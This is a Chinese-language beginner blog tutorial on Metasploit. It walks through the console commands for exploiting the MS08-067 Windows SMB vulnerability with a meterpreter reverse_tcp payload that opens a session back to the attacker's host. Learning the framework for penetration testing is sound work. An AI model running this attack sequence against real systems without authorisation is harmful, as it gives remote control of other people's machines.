Metasploit的新手知识

发表于 | 分类于 | 评论数:

Metasploit的新手知识

exploit模块------漏洞利用(已经发现的漏洞,并做出的攻击模型)
payload------shellcode-漏洞利用后执行的代码

  • 1.打开终端,输入

    msfconsole
    注意要更新为最新
    apt-get update +更新源
    有时候可能需要打开一个什么数据库,按他的提示来就好,如果发现matesploit程序出错了
    apt-get remove metasploit
    再重新安装一下
    apt-get install metasploit

  • 2.查看帮助,命令

    help
    或者查看模块
    show
    会看到帮助信息,或者漏洞利用相关的模块(系统/类型/漏洞利用程序)

  • 3.选择漏洞利用模块

    use exploit/windows/smb/ms08_067_netapi

  • 4.查看选项信息、参数

    show options
    RHOST为目标IP,RPORT为端口

  • 5.设置执行漏洞完成之后要执行的程序

    set PAYLOAD windows/meterpreter/reverse_tcp

  • 6.查看设置选项

    show options
    设置LHOST(本机IP)、LPORT(本机端口,有默认时可以不用设置)

  • 7.发起攻击

    exploit
    成功之后会反弹一个会话出来
-------------本文结束感谢您的阅读-------------
0%